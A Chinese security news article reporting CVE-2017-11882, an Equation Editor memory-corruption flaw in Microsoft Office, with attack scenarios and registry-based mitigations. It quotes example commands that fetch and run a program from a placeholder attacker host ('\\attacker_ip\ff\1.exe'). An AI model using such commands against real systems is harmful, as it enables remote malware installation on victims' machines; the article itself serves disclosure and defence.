当人们仍在着急处理“没有补丁”的微软MS Office内置DDE功能威胁时,有研究人员又发现了Office的另一个严重漏洞,攻击者可以利用该漏洞,无需受害者用户交互,远程向目标系统植入恶意软件。该漏洞属于内存破坏型漏洞,可影响微软过去17年发布的所有MS Office版本软件,包括最新的Office 365,漏洞利用能成功在包括Windows 10在内的所有微软Windows操作系统中实现。

漏洞信息

该漏洞由Embedi公司研究员发现,漏洞可导致远程代码执行、未授权认证绕过、无需用户交互的远程恶意程序植入。目前漏洞编号CVE-2017-11882,主要漏洞部件为Office中的自带公式编辑器EQNEDT32.EXE。

微软Office曝存在17年之久的“全版本影响”老洞,无需用户交互实现恶意程序远程植入1

由于不正确的内存操作,组件EQNEDT32.EXE会无法正确处理内存中的执行对象,这种破坏条件,致使攻击者可在当前系统登录用户环境下,利用Office远程植入恶意代码或其它恶意程序。

微软在Microsoft Office 2000中就引入了EQNEDT32.EXE组件,并保留至Microsoft Office 2007之后发布的所有Office 版本中,以确保新旧软件的文档兼容。

微软Office曝存在17年之久的“全版本影响”老洞,无需用户交互实现恶意程序远程植入2

该漏洞的成功利用需要受害者用Office打开攻击者特制的恶意文档,如果与微软的内核提权漏洞(如CVE-2017-11847)组合利用,攻击者将会获得受害者目标系统的完全控制权。以下视频是在Windows 7,8,10系统中该漏洞的成功实现过程演示:

漏洞技术分析

可能的攻击场景

Embedi研究者列举了以下几种该漏洞的可攻击利用场景:

当插入一些OLE(对象链接嵌入)实体时,可能会触发该漏洞,实现一些恶意命令的执行,如向某个攻击者架设网站下载执行恶意程序等。

最直接有效的漏洞利用方式就是,访问攻击者架设或控制的WebDAV服务器,并执行其中的运行程序。

不过,攻击者还能利用该漏洞执行cmd.exe /c start \\attacker_ip\ff类似恶意命令,配合入侵或启动WebClient服务。

另外,攻击者还能使用诸如\\attacker_ip\ff\1.exe的命令向受害者系统中执行恶意程序,恶意程序的启动机制与\\live.sysinternals.com\tools service方式类似。

缓解和修复措施

在11月的补丁修复周期中,微软针对该漏洞修改了EQNEDT32.EXE组件的内存处理机制,并发布了多个漏洞补丁更新,强烈建议用户及时进行下载更新。

鉴于EQNEDT32.EXE组件的不确定隐患,我们建议用户通过以下注册表命令来对其进行禁用:

reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0×400

如果在64位操作系统中安装了32位的MS Office软件,命令如下:

reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0×400

关注中国IDC圈官方微信:idc-quan 我们将定期推送IDC产业最新资讯

查看心情排 行你看到此篇文章的感受是:


  • 支持

  • 高兴

  • 震惊

  • 愤怒

  • 无聊

  • 无奈

  • 谎言

  • 枪稿

  • 不解

  • 标题党
2017-04-20 09:34:00
国内资讯 国家互联网应急中心:2016年捕获205万个恶意程序
4月19日下午消息,国家互联网应急中心发布了《2016年我国互联网网络安全态势综述》(以下简称为《综述》),综述数据显示,2016年,移动互联网恶意程序捕获数量、网站后门 <详情>
2017-02-13 11:12:27
云安全 不法分子借情人节话题传播恶意程序 伺机盗取用户机密信息
又到了一年一度朋友圈“撒狗粮”的日子了,玫瑰花、恩爱照、示爱信又将开启霸屏模式。当然,也有少不了适合“单身汪”的漂流瓶、网络趣图、情趣小游戏等等。 <详情>